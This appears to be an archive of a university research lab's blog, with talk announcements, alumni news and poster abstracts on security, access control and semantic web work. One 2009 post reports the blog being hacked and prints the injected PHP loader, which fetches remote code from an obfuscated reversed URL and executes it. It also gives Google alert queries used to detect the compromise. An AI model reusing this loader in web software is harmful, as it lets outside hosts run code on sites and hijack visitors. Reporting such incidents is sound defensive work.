October 22nd, 2017
Multi-observable Session Reputation Scoring System
11:00-12:00 Monday, 23 October 2017, ITE 346
With increasing adoption of Cloud Computing, cyber attacks have become one of the most effective means for adversaries to inflict damage. To overcome limitations of existing blacklists and whitelists, our research focuses to develop a dynamic reputation scoring model for sessions based on a variety of observable and derived attributes of network traffic. Here we propose a technique to greylist sessions using observables like IP, Domain, URL and File Hash by scoring them numerically based on the events in the session. This enables automatic labeling of possible malicious hosts or users that can help in enriching the existing whitelists or blacklists.
November 8th, 2016
In this week’s ebiquity meeting (11:30 8 Nov. 2016) Prajit Das will present his work on capturing policies for fine-grained access control on mobile devices.
As of 2016, there are more mobile devices than humans on earth. Today, mobile devices are a critical part of our lives and often hold sensitive corporate and personal data. As a result, they are a lucrative target for attackers, and managing data privacy and security on mobile devices has become a vital issue. Existing access control mechanisms in most devices are restrictive and inadequate. They do not take into account the context of a device and its user when making decisions. In many cases, the access granted to a subject should change based on context of a device. Such fine-grained, context-sensitive access control policies have to be personalized too. In this paper, we present the Mithril system, that uses policies represented in Semantic Web technologies and captured using user feedback, to handle access control on mobile devices. We present an iterative feedback process to capture user specific policy. We also present a policy violation metric that allows us to decide when the capture process is complete.
June 15th, 2014
Congratulations to ebiquity alumna Lalana Kagal (Ph.D. 2004) for being featured on MIT’s home page recently for recent work with Ph.D. student Oshani Seneviratne on enabling people to track how their private data is used online. You can read more about their work via this MIT news item and in their paper Enabling Privacy Through Transparency which will be presented next month in the 2014 IEEE Privacy Security and Trust conference.
October 5th, 2012
Three Ph.D. students from the ebiquity lab have posters at the ACM Student Research Competition and General Poster Session of the 2012 Grace Hopper Celebration of Women in Computing conference. The GHC conference is the largest technical conference for women in computing and results in collaborative proposals, networking and mentoring for junior women and increased visibility for the contributions of women in computing. Conference presenters are leaders in their respective fields, representing industry, academia and government. Top researchers present their work while special sessions focus on the role of women in today’s technology fields.
The three ebiquity lab students with posters this year are:
Automation of Cloud Services lifecycle by using Semantic technologies,
Karuna Panda Joshi
We have developed a new framework for automating the configuration, negotiation and procurement of services in a cloud computing environment using semantic web technologies.We have developed detailed Ontologies for the framework. We have designed a prototype, called Smart Cloud Services, which is based on this framework and also incorporates NIST’s policies on cloud computing. This prototype is integrated with different cloud platforms like Eucalyptus and VCL.
A Knowledge-Based Approach To Intrusion Detection Modeling,
M. Lisa Mathews
Current state of the art intrusion detection and prevention systems (IDPS) are signature-based systems that detect threats and vulnerabilities by cross-referencing the threat/vulnerability signatures in their databases. These systems are incapable of taking advantage of heterogeneous data sources for analysis of system activities for threat detection. This work presents a situation-aware intrusion detection model that integrates these heterogeneous data sources and builds a semantically rich knowledge-base to detect cyber threats/vulnerabilities.
Unsupervised Coreference Resolution for FOAF Instances,
Jennifer Alexander Sleeman
Coreference Resolution determines when two entity descriptions represent the same real world entity. Friend of a Friend (FOAF) is an ontology about people and their social networks. Currently there is not a way to easily recognize when two FOAF instances represent the same entity. Existing techniques that use supervised learning typically do not support incremental processing. I present an unsupervised approach that supports both heterogeneous data and incremental online processing.
December 24th, 2011
It’s very nice to see ebiquity alumna Akshaya Iyengar (MS, 2011) helping Wikipedia during its fund raising campaign. If you visit Wikipedia you might see her gracing a page you get, as I did just a minutes ago. See this screenshot and read her statement on why she has been donating to Wikipedia here. Her generosity has inspired me to contribute also.
September 16th, 2011
Here’s a word cloud that visualizes the 200 most significant words extracted from over 400 papers from our research group over the past ten years. Significance was estimated by tf-idf where the idf data is from a collection of newswire articles (thanks Paul!). The word cloud was created with Wordle.
June 10th, 2010
UMBC Computer Science alumnus Ralph Semmel (PhD. 1991) was just named as the next director of the Johns Hopkins University Applied Physics Laboratory. APL has a staff of 4,600 and an annual funding level of about $980 million. Dr. Semmel’s dissertation, A knowledge-based approach to automatic query formulation, developed novel techniques to disambiguate conceptual queries against a relational database. His dissertation research was supervised by his mentor, Computer Science Professor James Mayfield. We congratulate Ralph and wish him well in his new position.
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
The results of this Google search reveal many compromised blogs from the .edu domain.
October 12th, 2008
In this week’s ebiquity meeting (10:30am Tue Oct 14), PhD student Shenyong Zhang will present his recent work with Yun Peng on SMOOTY, a new efficient method for modifying a joint probability distribution to satisfy a set of inconsistent constraints. It extends the well-known “iterative proportional fitting procedure” (IPFP) which only works with consistent constraints. Compared to existing methods, SMOOTH is computationally more efficient and insensitive to data. Moreover, SMOOTH can be easily integrated with Bayesian networks for Bayesian reasoning with inconsistent constraints. A paper on this work, An Efficient Method for Probabilistic Knowledge Integration will apear in the proceedings of The 20th IEEE International Conference on Tools with Artificial Intelligence next month.